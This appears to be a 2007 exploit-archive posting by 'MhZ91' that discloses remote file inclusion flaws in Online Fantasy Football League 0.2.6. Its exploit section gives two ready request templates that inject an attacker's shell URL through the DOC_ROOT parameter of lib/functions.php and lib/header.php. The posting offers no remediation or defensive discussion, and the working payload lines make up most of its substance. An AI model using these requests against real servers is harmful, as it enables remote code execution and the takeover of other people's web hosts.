[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities
# Published : 2007-09-07
# Author : MhZ91
# Previous Title : RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln
# Next Title : phpMytourney (menu.php) Remote File Inclusion Vulnerability
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/offl/ Online Fantasy Football League 0.2.6
# Exploit:
# http://[target]/[path]/lib/functions.php?DOC_ROOT=[Shell]
# http://[target]/[path]/lib/header.php?DOC_ROOT=[Shell]
---------------------------------------------------------------
# www.Syue.com [2007-09-07]